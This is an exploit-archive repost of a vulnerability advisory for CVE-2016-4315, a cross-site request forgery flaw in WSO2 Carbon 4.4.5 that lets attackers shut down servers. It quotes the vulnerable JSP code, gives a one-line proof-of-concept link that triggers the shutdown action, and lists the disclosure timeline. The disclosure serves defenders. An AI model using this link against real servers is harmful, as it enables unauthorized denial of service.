WSO2 Carbon 4.4.5 - Denial of Service / Cross-Site Request Forgery

2016-08-16T00:00:00
ID 1337DAY-ID-25256
Type zdt
Reporter hyp3rlinx
Modified 2016-08-16T00:00:00

Description

Exploit for jsp platform in category web applications

                                        
                                            [+] Credits: John Page aka HYP3RLINX
 
 
Vendor:
============
www.wso2.com
 
 
Product:
==================
Ws02Carbon v4.4.5
 
WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario.
 
 
Vulnerability Type:
=================================
Cross Site Request Forgery / DOS
 
 
CVE Reference:
==============
CVE-2016-4315
 
 
Vulnerability Details:
=====================
 
The attack involves tricking a privileged user to initiate a request by clicking a malicious link or visiting an evil webpage to
shutdown WSO2 Servers.
 
 
References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0101
 
 
The getSafeText() Function and conditional logic below processes the "action" parameter with no check for inbound CSRF attacks.
 
String cookie = (String) session.getAttribute(ServerConstants.ADMIN_SERVICE_COOKIE);
String action = CharacterEncoder.getSafeText(request.getParameter("action"));
ServerAdminClient client = new ServerAdminClient(ctx, backendServerURL, cookie, session);
 
try {   
if ("restart".equals(action)) {
    client.restart();
 } else if ("restartGracefully".equals(action)) {
   client.restartGracefully();
 } else if ("shutdown".equals(action)) {
     client.shutdown();
  } else if ("shutdownGracefully".equals(action)) {
      client.shutdownGracefully();
    }
 } catch (Exception e) {
  response.sendError(500, e.getMessage());
   return;
 }
 
 
 
Exploit code(s):
===============
       
Shutdown the Carbon server
 
<a href="https://victim-server:9443/carbon/server-admin/proxy_ajaxprocessor.jsp?action=shutdown">Shut it down!</a>
 
 
Disclosure Timeline:
==========================================
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016  : Public Disclosure

#  0day.today [2018-02-19]  #